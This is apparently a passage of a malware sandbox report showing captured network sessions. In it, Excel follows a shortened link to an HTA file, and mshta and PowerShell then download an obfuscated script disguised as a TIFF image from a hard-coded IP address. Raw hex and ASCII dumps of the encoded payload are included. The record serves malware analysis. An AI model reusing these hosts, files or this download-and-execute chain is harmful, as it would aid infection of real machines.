                                                                                            Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                            Dec 10, 2024 06:57:45.530766964 CET1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                            Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                            Dec 10, 2024 06:57:45.530778885 CET1236INData Raw: 32 35 34 44 25 32 35 32 35 36 32 25 32 35 32 35 34 32 25 32 35 32 35 37 38 25 32 35 32 35 36 39 25 32 35 32 35 34 31 25 32 35 32 35 36 39 25 32 35 32 35 34 32 25 32 35 32 35 36 39 25 32 35 32 35 35 41 25 32 35 32 35 34 33 25 32 35 32 35 36 38 25
                                                                                            Data Ascii: 254D%252562%252542%252578%252569%252541%252569%252542%252569%25255A%252543%252568%25256C%252571%25256B%252543%252567%252543%252559%252562%252543%252555%252573%252556%252567%25254F%252564%25254F%252545%252571%252558%252565%25256E%252553%252555%
                                                                                            Dec 10, 2024 06:57:45.530790091 CET1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                            Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                                                            Dec 10, 2024 06:57:45.530812979 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                                                            Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                            Dec 10, 2024 06:57:45.530833006 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                            Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                            Dec 10, 2024 06:57:45.650151968 CET1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                            Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.2249166172.245.142.60803592C:\Windows\System32\mshta.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 10, 2024 06:57:49.039467096 CET479OUTGET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Range: bytes=8896-
                                                                                            Connection: Keep-Alive
                                                                                            Host: 172.245.142.60
                                                                                            If-Range: "304ff-628d23aa8f80d"
                                                                                            Dec 10, 2024 06:57:50.178848028 CET1236INHTTP/1.1 206 Partial Content
                                                                                            Date: Tue, 10 Dec 2024 05:57:49 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Mon, 09 Dec 2024 08:34:12 GMT
                                                                                            ETag: "304ff-628d23aa8f80d"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 188991
                                                                                            Content-Range: bytes 8896-197886/197887
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/hta
                                                                                            Data Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 43 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 [TRUNCATED]
                                                                                            Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252C%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                            Dec 10, 2024 06:57:50.179073095 CET224INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                            Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                            Dec 10, 2024 06:57:50.179089069 CET1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                            Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                            Dec 10, 2024 06:57:50.179096937 CET1236INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                                                            Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                                                            Dec 10, 2024 06:57:50.179102898 CET1236INData Raw: 25 32 35 32 35 34 33 25 32 35 32 35 35 35 25 32 35 32 35 35 35 25 32 35 32 35 35 30 25 32 35 32 35 34 32 25 32 35 32 35 37 37 25 32 35 32 35 36 44 25 32 35 32 35 36 39 25 32 35 32 35 34 34 25 32 35 32 35 36 42 25 32 35 32 35 37 37 25 32 35 32 35
                                                                                            Data Ascii: %252543%252555%252555%252550%252542%252577%25256D%252569%252544%25256B%252577%25256A%252553%252541%25256C%252562%252558%25257A%25254A%25254D%252554%252557%25255A%252563%252575%252570%252575%252546%252549%252557%252573%252570%252562%252549%2525
                                                                                            Dec 10, 2024 06:57:50.179107904 CET1236INData Raw: 35 34 41 25 32 35 32 35 37 32 25 32 35 32 35 36 31 25 32 35 32 35 36 32 25 32 35 32 35 36 35 25 32 35 32 35 35 39 25 32 35 32 35 35 30 25 32 35 32 35 35 31 25 32 35 32 35 37 38 25 32 35 32 35 35 38 25 32 35 32 35 35 35 25 32 35 32 35 34 44 25 32
                                                                                            Data Ascii: 54A%252572%252561%252562%252565%252559%252550%252551%252578%252558%252555%25254D%252576%25256C%252562%252552%252554%25254E%25254F%25254A%25256B%252575%25256F%252570%252577%25254F%252564%25256C%252557%25254B%252577%252562%252568%252542%25254E%2
                                                                                            Dec 10, 2024 06:57:50.179114103 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                            Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                            Dec 10, 2024 06:57:50.179219961 CET1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                            Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                            Dec 10, 2024 06:57:50.179231882 CET1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                            Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                            Dec 10, 2024 06:57:50.179244041 CET1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                            Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                            Dec 10, 2024 06:57:50.298675060 CET1236INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                                                            Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.2249167172.245.142.60803716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 10, 2024 06:57:57.078409910 CET392OUTGET /466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: 172.245.142.60
                                                                                            Connection: Keep-Alive
                                                                                            Dec 10, 2024 06:57:58.218962908 CET1236INHTTP/1.1 200 OK
                                                                                            Date: Tue, 10 Dec 2024 05:57:58 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Mon, 09 Dec 2024 08:27:27 GMT
                                                                                            ETag: "25960-628d22283020e"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 153952
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: image/tiff
                                                                                            Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 50 00 74 00 75 00 4f 00 71 00 6f 00 66 00 65 00 63 00 64 00 47 00 6b 00 48 00 4c 00 74 00 20 00 3d 00 20 00 22 00 63 00 49 00 6b 00 52 00 4e 00 72 00 57 00 57 00 7a 00 6e 00 64 00 75 00 78 00 70 00 42 00 22 00 0d 00 0a 00 6e 00 47 00 54 00 7a 00 4c 00 70 00 4b 00 69 00 63 00 71 00 70 00 74 00 69 00 61 00 6b 00 20 00 3d 00 20 00 22 00 47 00 55 00 4b 00 65 00 57 00 4c 00 70 00 75 00 65 00 6a 00 63 00 71 00 6c 00 65 00 4b 00 22 00 0d 00 0a 00 65 00 4c 00 65 00 6a 00 4c 00 41 00 57 00 55 00 6b 00 47 00 42 00 47 00 57 00 62 00 4c 00 20 00 3d 00 20 00 22 00 57 00 63 00 54 00 57 00 4c 00 6c 00 62 00 69 00 4b 00 57 00 69 00 6d 00 4a 00 6d 00 4f 00 22 00 0d 00 0a 00 0d 00 0a 00 4b 00 4e 00 6b 00 55 00 6e 00 7a 00 57 00 6f 00 75 00 68 00 51 00 4b 00 43 00 6f 00 57 00 20 00 3d 00 20 00 22 00 4f 00 7a 00 6f 00 47 00 41 00 6b 00 70 00 61 00 52 00 67 00 68 00 50 00 69 00 64 00 6c 00 22 00 0d 00 0a 00 6c 00 6b 00 52 00 68 00 6d 00 54 00 69 00 75 00 69 00 78 00 [TRUNCATED]
                                                                                            Data Ascii: PtuOqofecdGkHLt = "cIkRNrWWznduxpB"nGTzLpKicqptiak = "GUKeWLpuejcqleK"eLejLAWUkGBGWbL = "WcTWLlbiKWimJmO"KNkUnzWouhQKCoW = "OzoGAkpaRghPidl"lkRhmTiuixBLfxb = "PLnGekqaInWfiLa"NctUWsCbBLlmLJH = "tiGWWnmUoLkLKeQ"WiIKlniKljpAkGZ = "GiNkoBUxLcsWbLZ"cWeqBLoozjKtoLQ = "nipZiWjKLzmGWAv"WBoqiQliWCWlhik = "OAGWKmZSLcxUrWd"bALULqGxLWfuzmk = "lbmcWGAOZAmipcK"epLlxrKNKskhAUU = "LcKiKiizJNaoCbS"lkLhaPOnKhujfkh = "LhPCTeLZmnkGuZn"JGiLcC
                                                                                            Dec 10, 2024 06:57:58.218981028 CET1236INData Raw: 00 66 00 47 00 4b 00 4e 00 43 00 74 00 74 00 65 00 6b 00 20 00 3d 00 20 00 22 00 57 00 69 00 69 00 57 00 7a 00 57 00 62 00 6b 00 42 00 50 00 62 00 6f 00 47 00 61 00 63 00 22 00 0d 00 0a 00 50 00 6d 00 4c 00 57 00 66 00 53 00 6b 00 53 00 69 00 52
                                                                                            Data Ascii: fGKNCttek = "WiiWzWbkBPboGac"PmLWfSkSiRLmLKn = "BWGiWodLzmipzii"KGfGcjUZehKqnGm = "KZemAWKKnQNcLiP"kUIoeWZBWiczAL
                                                                                            Dec 10, 2024 06:57:58.218991995 CET448INData Raw: 00 6f 00 50 00 50 00 4c 00 61 00 4e 00 22 00 0d 00 0a 00 47 00 41 00 4c 00 51 00 63 00 47 00 63 00 63 00 41 00 62 00 4c 00 4c 00 4c 00 63 00 57 00 20 00 3d 00 20 00 22 00 69 00 62 00 47 00 6d 00 55 00 74 00 6d 00 4c 00 7a 00 4f 00 6b 00 55 00 47
                                                                                            Data Ascii: oPPLaN"GALQcGccAbLLLcW = "ibGmUtmLzOkUGqm"mIARWGULAqBAKiN = "GbCjoNZnRkmWIeL"GRhiIiuqkAiHcZh = "cjlichoNLLdiazg"n
                                                                                            Dec 10, 2024 06:57:58.219034910 CET1236INData Raw: 00 69 00 4f 00 57 00 63 00 55 00 4c 00 22 00 0d 00 0a 00 57 00 4e 00 68 00 75 00 57 00 4f 00 61 00 62 00 54 00 50 00 6f 00 70 00 4f 00 67 00 4b 00 20 00 3d 00 20 00 22 00 4c 00 61 00 4c 00 63 00 6d 00 4c 00 4b 00 63 00 70 00 64 00 6e 00 6d 00 4b
                                                                                            Data Ascii: iOWcUL"WNhuWOabTPopOgK = "LaLcmLKcpdnmKRh"nbGRHLqRfzsHskK = "ieKsdiLATGiIKcA"GRmKIAzziiacczU = "LuizPcLGNpWmLtn"S
                                                                                            Dec 10, 2024 06:57:58.219044924 CET1236INData Raw: 00 20 00 3d 00 20 00 22 00 6d 00 4c 00 65 00 67 00 69 00 69 00 75 00 53 00 41 00 57 00 6d 00 70 00 57 00 4b 00 4b 00 22 00 0d 00 0a 00 4e 00 4c 00 5a 00 4c 00 69 00 4f 00 57 00 4c 00 66 00 55 00 4c 00 50 00 78 00 5a 00 41 00 20 00 3d 00 20 00 22
                                                                                            Data Ascii: = "mLegiiuSAWmpWKK"NLZLiOWLfULPxZA = "bBqldNcoGGbZzpm"oOZfLWiWRtRKmvN = "bGvcLANWWLkLkLW"LOdLjmCGKkofPah = "PzrZ
                                                                                            Dec 10, 2024 06:57:58.219055891 CET1236INData Raw: 00 6b 00 4c 00 69 00 64 00 6c 00 57 00 5a 00 70 00 6d 00 7a 00 55 00 6e 00 5a 00 63 00 4b 00 20 00 3d 00 20 00 22 00 70 00 69 00 62 00 6c 00 47 00 78 00 4c 00 57 00 62 00 5a 00 4f 00 50 00 65 00 55 00 4f 00 22 00 0d 00 0a 00 41 00 72 00 68 00 4c
                                                                                            Data Ascii: kLidlWZpmzUnZcK = "piblGxLWbZOPeUO"ArhLiCKLGiQlLHU = "maqiIGTkzppWLfk"WpUPGGUWtLdnNLz = "mzOAIWtWNBNRmkm"TLJCJCelLU
                                                                                            Dec 10, 2024 06:57:58.219068050 CET1236INData Raw: 00 7a 00 64 00 4c 00 53 00 50 00 66 00 4f 00 66 00 51 00 47 00 67 00 47 00 22 00 0d 00 0a 00 6e 00 70 00 69 00 57 00 47 00 69 00 5a 00 64 00 69 00 4b 00 41 00 76 00 57 00 4e 00 5a 00 20 00 3d 00 20 00 22 00 75 00 4c 00 62 00 70 00 5a 00 4b 00 55
                                                                                            Data Ascii: zdLSPfOfQGgG"npiWGiZdiKAvWNZ = "uLbpZKUjmOckgCW"iObLGbKnzqLWGbk = "aiWqLNkUkZAUNLh"WKgcmUhzNhziicm = "LNhNLKLNfGBZv
                                                                                            Dec 10, 2024 06:57:58.219274998 CET1236INData Raw: 00 4b 00 50 00 62 00 68 00 6b 00 47 00 20 00 3d 00 20 00 22 00 70 00 66 00 41 00 52 00 4b 00 65 00 6d 00 4c 00 69 00 57 00 41 00 64 00 69 00 4c 00 63 00 22 00 0d 00 0a 00 68 00 6d 00 70 00 53 00 57 00 4c 00 53 00 50 00 4c 00 72 00 66 00 69 00 47
                                                                                            Data Ascii: KPbhkG = "pfARKemLiWAdiLc"hmpSWLSPLrfiGAL = "LLWBtLLaCAcWPhG"WpLbCInepALKuKu = "buPhNaLuzBfkTmZ"KUatbKUcoiWuNcb =
                                                                                            Dec 10, 2024 06:57:58.219335079 CET1236INData Raw: 00 41 00 6f 00 4c 00 22 00 0d 00 0a 00 57 00 68 00 4b 00 57 00 63 00 4b 00 7a 00 63 00 70 00 42 00 52 00 66 00 55 00 74 00 74 00 20 00 3d 00 20 00 22 00 7a 00 4c 00 6f 00 64 00 5a 00 49 00 4c 00 5a 00 47 00 41 00 4b 00 75 00 69 00 5a 00 6e 00 22
                                                                                            Data Ascii: AoL"WhKWcKzcpBRfUtt = "zLodZILZGAKuiZn"kkcPiZvHfmBGGoo = "WSbbCLndzoNNBWk"oBiNlaLLmfTLnRK = "ZLWvKKpnRUKKWRK"mxCn
                                                                                            Dec 10, 2024 06:57:58.219346046 CET1236INData Raw: 00 3d 00 20 00 22 00 6b 00 41 00 65 00 78 00 7a 00 63 00 4e 00 4c 00 42 00 70 00 49 00 50 00 75 00 57 00 49 00 22 00 0d 00 0a 00 6d 00 6b 00 5a 00 6c 00 57 00 6f 00 41 00 57 00 57 00 78 00 49 00 70 00 69 00 47 00 64 00 20 00 3d 00 20 00 22 00 54
                                                                                            Data Ascii: = "kAexzcNLBpIPuWI"mkZlWoAWWxIpiGd = "TUeKKCbcZbjkzzN"kpeilWOoQWhUiLL = "ezGUbHtKczUWNWi"AkKHjcABTWWlipG = "BGacLio
                                                                                            Dec 10, 2024 06:57:58.338639975 CET1236INData Raw: 00 4f 00 57 00 4b 00 53 00 4c 00 50 00 6f 00 62 00 57 00 47 00 55 00 47 00 20 00 3d 00 20 00 22 00 4e 00 68 00 7a 00 6e 00 57 00 48 00 6f 00 57 00 69 00 47 00 64 00 4b 00 6d 00 51 00 6f 00 22 00 0d 00 0a 00 6c 00 69 00 69 00 5a 00 4c 00 57 00 4c
                                                                                            Data Ascii: OWKSLPobWGUG = "NhznWHoWiGdKmQo"liiZLWLLGGaqsjL = "cJlelUGLZLdGCbk"ipdsNWniubGWnGW = "ZLkvvuCANbKkULO"ctNebaGIWZz


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.2249173172.245.142.60801972C:\Windows\System32\mshta.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 10, 2024 06:58:12.088566065 CET514OUTGET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            If-Modified-Since: Mon, 09 Dec 2024 08:34:12 GMT
                                                                                            Connection: Keep-Alive
                                                                                            Host: 172.245.142.60
                                                                                            If-None-Match: "304ff-628d23aa8f80d"
                                                                                            Dec 10, 2024 06:58:13.226474047 CET275INHTTP/1.1 304 Not Modified
                                                                                            Date: Tue, 10 Dec 2024 05:58:13 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Mon, 09 Dec 2024 08:34:12 GMT
                                                                                            ETag: "304ff-628d23aa8f80d"
                                                                                            Accept-Ranges: bytes
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.224916354.150.207.1314433312C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-10 05:57:43 UTC405OUTGET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: short.ruksk.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-10 05:57:44 UTC505INHTTP/1.1 302 Found
                                                                                            Date: Tue, 10 Dec 2024 05:57:44 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            X-DNS-Prefetch-Control: off
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                            X-Download-Options: noopen
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Location: http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
                                                                                            Vary: Accept
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 125
                                                                                            Connection: close
                                                                                            2024-12-10 05:57:44 UTC125INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 34 32 2e 36 30 2f 34 36 36 2f 77 63 63 2f 6d 61 74 63 68 69 6e 67 77 69 74 68 62 65 73 74 74 68 69 6e 67 73 74 6f 62 65 67 72 65 61 74 66 6f 72 65 6e 74 69 72 65 6c 69 66 65 67 69 76 65 6e 6d 65 62 65 73 74 74 68 69 67 6e 73 65 76 65 72 67 69 76 65 2e 68 74 61
                                                                                            Data Ascii: Found. Redirecting to http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.224916554.150.207.1314433592C:\Windows\System32\mshta.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-10 05:57:48 UTC429OUTGET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: short.ruksk.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-10 05:57:48 UTC505INHTTP/1.1 302 Found
                                                                                            Date: Tue, 10 Dec 2024 05:57:48 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            X-DNS-Prefetch-Control: off
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                            X-Download-Options: noopen
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Location: http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
                                                                                            Vary: Accept
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 125
